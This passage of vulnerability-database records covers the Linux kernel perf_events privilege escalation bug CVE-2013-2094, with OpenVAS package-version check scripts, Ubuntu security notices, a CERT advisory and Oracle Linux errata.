value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-21-generic\", ver:\"3.8.0-21.32\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841425", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1828-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1828_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-1828-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841425\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:35 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1828-1\");\n\n script_xref(name:\"USN\", value:\"1828-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1828-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841424", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841424", "type": "openvas", "title": "Ubuntu Update for linux USN-1826-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1826_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1826-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841424\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:33 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1826-1\");\n\n script_xref(name:\"USN\", value:\"1826-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1826-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-highbank\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-omap\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-powerpc-smp\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-powerpc64-smp\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of linux", "modified": "2017-12-01T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841423", "href": "http://plugins.openvas.org/nasl.php?oid=841423", "type": "openvas", "title": "Ubuntu Update for linux USN-1825-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1825_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for linux USN-1825-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 12.04 LTS\";\ntag_insight = \"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(841423);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:30 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1825-1\");\n\n script_xref(name: \"USN\", value: \"1825-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1825-1/\");\n script_summary(\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-generic\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-generic-pae\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-highbank\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-omap\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-powerpc-smp\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-powerpc64-smp\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-virtual\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-18T01:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 6, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1825-1", "href": "https://ubuntu.com/security/notices/USN-1825-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:31:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 5, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1826-1", "href": "https://ubuntu.com/security/notices/USN-1826-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:33:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 5, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1827-1", "href": "https://ubuntu.com/security/notices/USN-1827-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 6, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1828-1", "href": "https://ubuntu.com/security/notices/USN-1828-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:38:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3301", "CVE-2013-1929", "CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "id": "USN-1836-1", "href": "https://ubuntu.com/security/notices/USN-1836-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:31:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3301", "CVE-2013-1929", "CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-30T00:00:00", "published": "2013-05-30T00:00:00", "id": "USN-1838-1", "href": "https://ubuntu.com/security/notices/USN-1838-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2141", "CVE-2013-3301", "CVE-2013-1929", "CVE-2013-1979", "CVE-2013-2094"], "description": "An flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nAndy Lutomirski discover an error in the Linux kernel's credential handling \non unix sockets. A local user could exploit this flaw to gain \nadministrative privileges. (CVE-2013-1979)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nAn information leak was discovered in the Linux kernel's tkill and tgkill \nsystem calls when used from compat processes. A local user could exploit \nthis flaw to examine potentially sensitive kernel memory. (CVE-2013-2141)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-28T00:00:00", "published": "2013-05-28T00:00:00", "id": "USN-1839-1", "href": "https://ubuntu.com/security/notices/USN-1839-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:41:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3228", "CVE-2013-3230", "CVE-2013-2141", "CVE-2013-3232", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-3224", "CVE-2013-3234", "CVE-2013-3233", "CVE-2013-3227", "CVE-2013-3225", "CVE-2013-2850", "CVE-2013-3222", "CVE-2013-2146", "CVE-2013-3076", "CVE-2013-3226", "CVE-2013-2094", "CVE-2013-3235", "CVE-2013-3223"], "description": "Kees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote \nunauthenticated attacker could exploit this flaw to cause a denial of \nservice (system crash) or potentially gain administrative privileges. \n(CVE-2013-2850)\n\nAn flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nAn information leak was discovered in the Linux kernel's tkill and tgkill \nsystem calls when used from compat processes. A local user could exploit \nthis flaw to examine potentially sensitive kernel memory. (CVE-2013-2141)\n\nA flaw was discovered in the Linux kernel's perf events subsystem for Intel \nSandy Bridge and Ivy Bridge processors. A local user could exploit this \nflaw to cause a denial of service (system crash). (CVE-2013-2146)\n\nAn information leak was discovered in the Linux kernel's crypto API. A \nlocal user could exploit this flaw to examine potentially sensitive \ninformation from the kernel's stack memory. (CVE-2013-3076)\n\nAn information leak was discovered in the Linux kernel's rcvmsg path for \nATM (Asynchronous Transfer Mode). A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3222)\n\nAn information leak was discovered in the Linux kernel's recvmsg path for \nax25 address family. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3223)\n\nAn information leak was discovered in the Linux kernel's recvmsg path for \nthe bluetooth address family. A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3224)\n\nAn information leak was discovered in the Linux kernel's bluetooth rfcomm \nprotocol support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3225)\n\nAn information leak was discovered in the Linux kernel's bluetooth SCO \nsockets implementation. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3226)\n\nAn information leak was discovered in the Linux kernel's CAIF protocol \nimplementation. A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3227)\n\nAn information leak was discovered in the Linux kernel's IRDA (infrared) \nsupport subsystem. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3228)\n\nAn information leak was discovered in the Linux kernel's s390 - z/VM \nsupport. A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3229)\n\nAn information leak was discovered in the Linux kernel's l2tp (Layer Two \nTunneling Protocol) implementation. A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3230)\n\nAn information leak was discovered in the Linux kernel's llc (Logical Link \nLayer 2) support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3231)\n\nAn information leak was discovered in the Linux kernel's receive message \nhandling for the netrom address family. A local user could exploit this \nflaw to obtain sensitive information from the kernel's stack memory. \n(CVE-2013-3232)\n\nAn information leak was discovered in the Linux kernel's nfc (near field \ncommunication) support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3233)\n\nAn information leak was discovered in the Linux kernel's Rose X.25 protocol \nlayer. A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3234)\n\nAn information leak was discovered in the Linux kernel's TIPC (Transparent \nInter Process Communication) protocol implementation. A local user could \nexploit this flaw to examine potentially sensitive information from the \nkernel's stack memory. (CVE-2013-3235)", "edition": 6, "modified": "2013-05-31T00:00:00", "published": "2013-05-31T00:00:00", "id": "USN-1849-1", "href": "https://ubuntu.com/security/notices/USN-1849-1", "title": "Linux kernel (Raring HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:48", "bulletinFamily": "info", "cvelist": ["CVE-2013-2094"], "description": "### Overview \n\nThe Linux kernel's Performance Events implementation is susceptible to an out-of-bounds array vulnerability that may be used by a local unprivileged user to escalate privileges.\n\n### Description \n\nThe Linux kernel's Performance Events implementation is susceptible to an out-of-bounds array vulnerability that may be used by a local unprivileged user to escalate privileges. Additional analysis of the vulnerability may be found in the [Red Hat bug report](<https://bugzilla.redhat.com/show_bug.cgi?id=962792>). A public exploit is available that has been reported to work against some Linux distributions. \n \n--- \n \n### Impact \n\nA local authenticated user may be able to exploit this vulnerability to escalate privileges. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\n[Red Hat](<https://rhn.redhat.com/errata/RHSA-2013-0830.html>), [Debian](<http://www.debian.org/security/2013/dsa-2669>), [CentOS](<http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-2094.html>) have all released patches. Users should receive the patches through their Linux distributions' normal update process. \n \n_Affected Distributions_\n\n * Red Hat Enterprise Linux 6 & Red Hat Enterprise MRG 2\n * CentOS 6\n * Debian 7.0 (Wheezy)\n * Ubuntu 12.04 LTS, 12.10, 13.04\nOther distributions may be affected but were not confirmed at the time of publication. \n--- \n \nIf you are unable to upgrade, please consider the following workaround. \n \nRed Hat has provided mitigation advice in [Red Hat Knowledge Solution 373743](<https://access.redhat.com/site/solutions/373743>). \n \n--- \n \n### Vendor Information\n\n774103\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### CentOS Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019729.html>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>\n\n### Debian GNU/Linux Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2013/dsa-2669>\n\n### Red Hat, Inc. Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792>\n * <https://rhn.redhat.com/errata/RHSA-2013-0830.html>\n\n### Ubuntu Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-1825-1/>\n * <http://www.ubuntu.com/usn/usn-1826-1/>\n * <http://www.ubuntu.com/usn/usn-1827-1/>\n * <http://www.ubuntu.com/usn/usn-1828-1/>\n\n### Fedora Project Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.9 | E:ND/RL:OF/RC:C \nEnvironmental | 4.4 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://rhn.redhat.com/errata/RHSA-2013-0830.html>\n * <http://www.debian.org/security/2013/dsa-2669>\n * <http://www.ubuntu.com/usn/usn-1825-1/>\n * <http://www.ubuntu.com/usn/usn-1826-1/>\n * <http://www.ubuntu.com/usn/usn-1827-1/>\n * <http://www.ubuntu.com/usn/usn-1828-1/>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019729.html>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792#c16>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962799>\n * <http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b0a873ebbf87bf38bf70b5e39a7cadc96099fa13>\n * <http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/kernel/events/core.c?id=8176cced706b5e5d15887584150764894e94e02f>\n * <http://packetstormsecurity.com/files/121616/semtex.c>\n * <http://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03652.html>\n * <http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck>\n\n### Acknowledgements\n\nTommi Rantala discovered this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-2094](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-2094>) \n---|--- \n**Date Public:** | 2013-05-14 \n**Date First Published:** | 2013-05-17 \n**Date Last Updated: ** | 2013-05-17 16:00 UTC \n**Document Revision: ** | 28 \n", "modified": "2013-05-17T16:00:00", "published": "2013-05-17T00:00:00", "id": "VU:774103", "href": "https://www.kb.cert.org/vuls/id/774103", "type": "cert", "title": "Linux kernel perf_swevent_enabled array out-of-bound access privilege escalation vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "[2.6.39-400.24.1]\n- perf: Treat attr.config as u64 in perf_swevent_init() (Tommi Rantala) [Orabug: 16808734] {CVE-2013-2094}", "edition": 4, "modified": "2013-05-15T00:00:00", "published": "2013-05-15T00:00:00", "id": "ELSA-2013-2524", "href": "http://linux.oracle.com/errata/ELSA-2013-2524.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "[2.6.32-358.6.2]\n- [kernel] perf: fix perf_swevent_enabled array out-of-bound access (Petr Matousek) [962793 962794] {CVE-2013-2094}", "edition": 4, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": 